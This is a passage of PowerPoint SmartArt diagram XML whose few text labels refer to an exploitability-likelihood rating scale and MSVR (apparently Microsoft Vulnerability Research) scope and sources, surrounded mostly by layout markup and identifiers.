        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{20AE269E-9EE8-4BE3-8D6D-152A8A5F5DA0}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
            <a:t>Provide a prediction of likelihood of exploitation for each vulnerability</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" b="1" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{99B473B0-2A56-4A8E-B0B0-C46DADF78415}" type="parTrans" cxnId="{FDD4976D-A593-4063-8E7B-8AEE88335EC5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4E6C0BA5-2A12-4BA0-8F14-BB3C28495303}" type="sibTrans" cxnId="{FDD4976D-A593-4063-8E7B-8AEE88335EC5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AA317EAE-4538-42D4-80DB-75555789C2D2}" type="pres">
      <dgm:prSet presAssocID="{0437CF5E-0DA1-4896-AE94-1B36088B93AD}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{168A0D26-A40C-491D-ABFA-47967D2B1196}" type="pres">
      <dgm:prSet presAssocID="{686B00F9-0D00-4B32-BFFF-B0B37A8FFF39}" presName="parTxOnly" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{65B30948-2C23-4E65-8918-B18A3368C0C6}" type="pres">
      <dgm:prSet presAssocID="{B083171C-D8EC-4C95-B7B6-1CEA2D576ED4}" presName="parTxOnlySpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B16D11B1-511D-4B54-BC93-4E52BAD37A40}" type="pres">
      <dgm:prSet presAssocID="{28627677-DDB6-4A28-A6D6-D77B65BDA065}" presName="parTxOnly" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5741BCFB-EAD7-4EB0-8036-28EA5E253088}" type="pres">
      <dgm:prSet presAssocID="{96EB227C-AF5D-42FE-90B6-350A644F8C1F}" presName="parTxOnlySpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8E934C04-521E-4BFE-A0DB-E3C747EE3A0F}" type="pres">
      <dgm:prSet presAssocID="{20AE269E-9EE8-4BE3-8D6D-152A8A5F5DA0}" presName="parTxOnly" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{33EA2B00-8824-48D5-A9E8-74359304D5C8}" srcId="{0437CF5E-0DA1-4896-AE94-1B36088B93AD}" destId="{686B00F9-0D00-4B32-BFFF-B0B37A8FFF39}" srcOrd="0" destOrd="0" parTransId="{EFBE95B6-7E29-4FCB-8B51-563E40584BA2}" sibTransId="{B083171C-D8EC-4C95-B7B6-1CEA2D576ED4}"/>
    <dgm:cxn modelId="{FDD4976D-A593-4063-8E7B-8AEE88335EC5}" srcId="{0437CF5E-0DA1-4896-AE94-1B36088B93AD}" destId="{20AE269E-9EE8-4BE3-8D6D-152A8A5F5DA0}" srcOrd="2" destOrd="0" parTransId="{99B473B0-2A56-4A8E-B0B0-C46DADF78415}" sibTransId="{4E6C0BA5-2A12-4BA0-8F14-BB3C28495303}"/>
    <dgm:cxn modelId="{75729B91-E906-4D23-80F8-62A1E1199D2A}" srcId="{0437CF5E-0DA1-4896-AE94-1B36088B93AD}" destId="{28627677-DDB6-4A28-A6D6-D77B65BDA065}" srcOrd="1" destOrd="0" parTransId="{10D1D66F-05EE-4168-80A4-9AEFD6F3439D}" sibTransId="{96EB227C-AF5D-42FE-90B6-350A644F8C1F}"/>
    <dgm:cxn modelId="{CE90986C-63FB-4B7B-9243-FFF09474DB9F}" type="presOf" srcId="{686B00F9-0D00-4B32-BFFF-B0B37A8FFF39}" destId="{168A0D26-A40C-491D-ABFA-47967D2B1196}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{1C99F55C-233D-4A60-8BA6-FBC456B5966A}" type="presOf" srcId="{0437CF5E-0DA1-4896-AE94-1B36088B93AD}" destId="{AA317EAE-4538-42D4-80DB-75555789C2D2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{2471AE3E-367C-4288-83C9-850E7BAD1B6A}" type="presOf" srcId="{28627677-DDB6-4A28-A6D6-D77B65BDA065}" destId="{B16D11B1-511D-4B54-BC93-4E52BAD37A40}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{BF96D1C9-A1E0-46C9-9367-AD3DE1E6781F}" type="presOf" srcId="{20AE269E-9EE8-4BE3-8D6D-152A8A5F5DA0}" destId="{8E934C04-521E-4BFE-A0DB-E3C747EE3A0F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{4E196553-F062-46FD-9E61-C02B0CA0C8D4}" type="presParOf" srcId="{AA317EAE-4538-42D4-80DB-75555789C2D2}" destId="{168A0D26-A40C-491D-ABFA-47967D2B1196}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{E173D9D0-BB14-45C6-AE2D-7FEA0B374401}" type="presParOf" srcId="{AA317EAE-4538-42D4-80DB-75555789C2D2}" destId="{65B30948-2C23-4E65-8918-B18A3368C0C6}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{825F4E5E-B415-45FE-9549-28BFE24B5695}" type="presParOf" srcId="{AA317EAE-4538-42D4-80DB-75555789C2D2}" destId="{B16D11B1-511D-4B54-BC93-4E52BAD37A40}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{7FF92484-AF53-4FB5-B33D-60AC33860D17}" type="presParOf" srcId="{AA317EAE-4538-42D4-80DB-75555789C2D2}" destId="{5741BCFB-EAD7-4EB0-8036-28EA5E253088}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{A180975B-5225-40FB-85AB-B4A20D9DB3BC}" type="presParOf" srcId="{AA317EAE-4538-42D4-80DB-75555789C2D2}" destId="{8E934C04-521E-4BFE-A0DB-E3C747EE3A0F}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
  </dgm:cxnLst>
  <dgm:bg/>
  <dgm:whole/>
</dgm:dataModel>
</file>

<file path=ppt/diagrams/data5.xml><?xml version="1.0" encoding="utf-8"?>
<dgm:dataModel xmlns:dgm="http://schemas.openxmlformats.org/drawingml/2006/diagram" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
  <dgm:ptLst>
    <dgm:pt modelId="{793E73D6-D7DD-422F-8927-B1B4EA972889}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/process4" loCatId="list" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/3d1" qsCatId="3D" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/colorful1" csCatId="colorful" phldr="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{23892BC5-6E90-4167-B13C-EECCBF519373}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
            <a:t>Consistent Exploit Code Likely</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" b="1" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{56E32E93-18C3-416E-B89E-5A72DE95E1BC}" type="parTrans" cxnId="{D7F20E7D-5FD4-41A7-AAB7-D64AA6CAD9DC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2204A984-28F3-4537-86AB-9E5D4415B92E}" type="sibTrans" cxnId="{D7F20E7D-5FD4-41A7-AAB7-D64AA6CAD9DC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{10E2FDE1-FEE8-476D-A96B-472401FD0574}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
            <a:t>Inconsistent Exploit Code Likely</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" b="1" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DE1A51A2-3E0D-451D-BC12-E5B36E5E5A82}" type="parTrans" cxnId="{2A172330-00A0-4A3C-8679-21416BE4E0C7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{54331B2A-1ADA-415D-B034-E6B54017CA75}" type="sibTrans" cxnId="{2A172330-00A0-4A3C-8679-21416BE4E0C7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0750B9B3-6DE6-4C7F-AD42-A38824D0CF45}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
            <a:t>Functioning Exploit Code Unlikely</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" b="1" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{87AAF8B8-B8BC-4F1A-AEF7-482F7423F011}" type="parTrans" cxnId="{9ED62B22-01ED-473C-A936-4564E407B81D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F02D5676-6790-4140-8C14-2E6A276C2F70}" type="sibTrans" cxnId="{9ED62B22-01ED-473C-A936-4564E407B81D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7F742756-1E83-4927-8382-888FACF2907C}" type="pres">
      <dgm:prSet presAssocID="{793E73D6-D7DD-422F-8927-B1B4EA972889}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D81DEBDC-DD29-4273-9466-777335194A96}" type="pres">
      <dgm:prSet presAssocID="{0750B9B3-6DE6-4C7F-AD42-A38824D0CF45}" presName="boxAndChildren" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AA80C763-1DFA-49BE-9D1A-B5AF8381B5BB}" type="pres">
      <dgm:prSet presAssocID="{0750B9B3-6DE6-4C7F-AD42-A38824D0CF45}" presName="parentTextBox" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3644EABA-A420-46A3-A329-586551B8E063}" type="pres">
      <dgm:prSet presAssocID="{54331B2A-1ADA-415D-B034-E6B54017CA75}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5E268239-83F5-41AE-A084-4C0197E204D4}" type="pres">
      <dgm:prSet presAssocID="{10E2FDE1-FEE8-476D-A96B-472401FD0574}" presName="arrowAndChildren" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F4A25601-0D4E-4DE6-A6F2-CE30EA0A7E19}" type="pres">
      <dgm:prSet presAssocID="{10E2FDE1-FEE8-476D-A96B-472401FD0574}" presName="parentTextArrow" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{78474EBE-6D4D-48C9-9422-98B702F011ED}" type="pres">
      <dgm:prSet presAssocID="{2204A984-28F3-4537-86AB-9E5D4415B92E}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C8DC6341-644C-4CE0-8849-9543E37F7940}" type="pres">
      <dgm:prSet presAssocID="{23892BC5-6E90-4167-B13C-EECCBF519373}" presName="arrowAndChildren" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DB09BFF6-24CF-4130-B544-1501CCED3AD5}" type="pres">
      <dgm:prSet presAssocID="{23892BC5-6E90-4167-B13C-EECCBF519373}" presName="parentTextArrow" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{515B111D-2B71-4D26-9CC1-98AB228F68F3}" type="presOf" srcId="{23892BC5-6E90-4167-B13C-EECCBF519373}" destId="{DB09BFF6-24CF-4130-B544-1501CCED3AD5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process4"/>
    <dgm:cxn modelId="{9ED62B22-01ED-473C-A936-4564E407B81D}" srcId="{793E73D6-D7DD-422F-8927-B1B4EA972889}" destId="{0750B9B3-6DE6-4C7F-AD42-A38824D0CF45}" srcOrd="2" destOrd="0" parTransId="{87AAF8B8-B8BC-4F1A-AEF7-482F7423F011}" sibTransId="{F02D5676-6790-4140-8C14-2E6A276C2F70}"/>
    <dgm:cxn modelId="{D7F20E7D-5FD4-41A7-AAB7-D64AA6CAD9DC}" srcId="{793E73D6-D7DD-422F-8927-B1B4EA972889}" destId="{23892BC5-6E90-4167-B13C-EECCBF519373}" srcOrd="0" destOrd="0" parTransId="{56E32E93-18C3-416E-B89E-5A72DE95E1BC}" sibTransId="{2204A984-28F3-4537-86AB-9E5D4415B92E}"/>
    <dgm:cxn modelId="{2BD782E8-F810-4405-8C04-E4962AD14DBF}" type="presOf" srcId="{10E2FDE1-FEE8-476D-A96B-472401FD0574}" destId="{F4A25601-0D4E-4DE6-A6F2-CE30EA0A7E19}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process4"/>
    <dgm:cxn modelId="{E92DAD74-CECC-4318-9363-43A160FB0E7E}" type="presOf" srcId="{0750B9B3-6DE6-4C7F-AD42-A38824D0CF45}" destId="{AA80C763-1DFA-49BE-9D1A-B5AF8381B5BB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process4"/>
    <dgm:cxn modelId="{829FF041-72BC-4B5A-AD3D-CD9AC0008192}" type="presOf" srcId="{793E73D6-D7DD-422F-8927-B1B4EA972889}" destId="{7F742756-1E83-4927-8382-888FACF2907C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process4"/>
    <dgm:cxn modelId="{2A172330-00A0-4A3C-8679-21416BE4E0C7}" srcId="{793E73D6-D7DD-422F-8927-B1B4EA972889}" destId="{10E2FDE1-FEE8-476D-A96B-472401FD0574}" srcOrd="1" destOrd="0" parTransId="{DE1A51A2-3E0D-451D-BC12-E5B36E5E5A82}" sibTransId="{54331B2A-1ADA-415D-B034-E6B54017CA75}"/>
    <dgm:cxn modelId="{FD89B808-54F7-4D47-AFA6-6D4CBB374DFB}" type="presParOf" srcId="{7F742756-1E83-4927-8382-888FACF2907C}" destId="{D81DEBDC-DD29-4273-9466-777335194A96}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process4"/>
    <dgm:cxn modelId="{E5098360-69ED-4889-BE2C-E58091BD488A}" type="presParOf" srcId="{D81DEBDC-DD29-4273-9466-777335194A96}" destId="{AA80C763-1DFA-49BE-9D1A-B5AF8381B5BB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process4"/>
    <dgm:cxn modelId="{D557E727-F866-476F-ADAE-779EDE412BBB}" type="presParOf" srcId="{7F742756-1E83-4927-8382-888FACF2907C}" destId="{3644EABA-A420-46A3-A329-586551B8E063}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process4"/>
    <dgm:cxn modelId="{9242CC79-321E-4AC0-A488-37AF0FFD9E5F}" type="presParOf" srcId="{7F742756-1E83-4927-8382-888FACF2907C}" destId="{5E268239-83F5-41AE-A084-4C0197E204D4}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process4"/>
    <dgm:cxn modelId="{65F192F8-EF4A-497E-9D80-25F00A719321}" type="presParOf" srcId="{5E268239-83F5-41AE-A084-4C0197E204D4}" destId="{F4A25601-0D4E-4DE6-A6F2-CE30EA0A7E19}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process4"/>
    <dgm:cxn modelId="{72AD4935-E23C-4241-ADEF-7EA311EFC27C}" type="presParOf" srcId="{7F742756-1E83-4927-8382-888FACF2907C}" destId="{78474EBE-6D4D-48C9-9422-98B702F011ED}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process4"/>
    <dgm:cxn modelId="{7D3630EB-C8A4-4C42-9E71-A45D297F5199}" type="presParOf" srcId="{7F742756-1E83-4927-8382-888FACF2907C}" destId="{C8DC6341-644C-4CE0-8849-9543E37F7940}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process4"/>
    <dgm:cxn modelId="{F504D27C-346A-4EEE-B1C0-9353E38762E8}" type="presParOf" srcId="{C8DC6341-644C-4CE0-8849-9543E37F7940}" destId="{DB09BFF6-24CF-4130-B544-1501CCED3AD5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process4"/>
  </dgm:cxnLst>
  <dgm:bg/>
  <dgm:whole/>
</dgm:dataModel>
</file>

<file path=ppt/diagrams/data6.xml><?xml version="1.0" encoding="utf-8"?>
<dgm:dataModel xmlns:dgm="http://schemas.openxmlformats.org/drawingml/2006/diagram" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
  <dgm:ptLst>
    <dgm:pt modelId="{1EEC2EFB-E23F-4ECE-B230-F903B2726229}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/equation1" loCatId="relationship" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/3d1" qsCatId="3D" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/colorful2" csCatId="colorful" phldr="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F7B25C6F-8B11-4661-8EC6-EFE0D3979473}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2500" b="1" dirty="0" smtClean="0"/>
            <a:t>MSVR Scope</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2500" b="1" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C6B4686F-5611-4E33-BC95-BAE64EDF95B6}" type="parTrans" cxnId="{C6BFF34A-D04C-497D-9448-19B7B2368314}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{959E33AD-0B2F-478B-A25A-25D803190A6D}" type="sibTrans" cxnId="{C6BFF34A-D04C-497D-9448-19B7B2368314}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{05BF4E8C-22DA-455C-903E-B158DBE5DFE0}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2500" b="1" dirty="0" smtClean="0"/>
            <a:t>MSVR Sources</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2500" b="1" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C5ABC212-4328-411D-BE9C-C4B0F6FD1152}" type="parTrans" cxnId="{122FEE96-A78C-4508-A025-91A5609ECADA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{15BC8F29-8483-460A-A27A-EB9734F490EA}" type="sibTrans" cxnId="{122FEE96-A78C-4508-A025-91A5609ECADA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BD29A749-3405-46C4-B7E2-B20750BEC23E}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:blipFill rotWithShape="0">
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </a:blipFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2500" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Protection Beyond Windows </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2500" b="1" dirty="0">
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E98CEF96-D0CA-49A1-B9B4-43797508DB0C}" type="sibTrans" cxnId="{58E654E0-CB8E-4E5F-A5AE-6F304E1E477D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9F55505D-E9CC-4089-B50B-23E8DD5ED202}" type="parTrans" cxnId="{58E654E0-CB8E-4E5F-A5AE-6F304E1E477D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8D23306F-342C-4C3B-B00D-4FCA9D528A6B}" type="pres">
      <dgm:prSet presAssocID="{1EEC2EFB-E23F-4ECE-B230-F903B2726229}" presName="linearFlow" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D6758BBB-54DC-4DE2-B744-517C3580A946}" type="pres">
      <dgm:prSet presAssocID="{F7B25C6F-8B11-4661-8EC6-EFE0D3979473}" presName="node" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{40DCE71E-EC90-4FBD-BAB0-87262DCB4A87}" type="pres">
      <dgm:prSet presAssocID="{959E33AD-0B2F-478B-A25A-25D803190A6D}" presName="spacerL" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{68306426-D89E-4771-A8BC-26B75A4BDE70}" type="pres">
      <dgm:prSet presAssocID="{959E33AD-0B2F-478B-A25A-25D803190A6D}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E0B535D3-3AEA-441A-88B9-7C28C6A6F7A2}" type="pres">
      <dgm:prSet presAssocID="{959E33AD-0B2F-478B-A25A-25D803190A6D}" presName="spacerR" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{554E3CE6-577D-4D6C-8DA5-CFB60B43CF6C}" type="pres">
      <dgm:prSet presAssocID="{05BF4E8C-22DA-455C-903E-B158DBE5DFE0}" presName="node" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
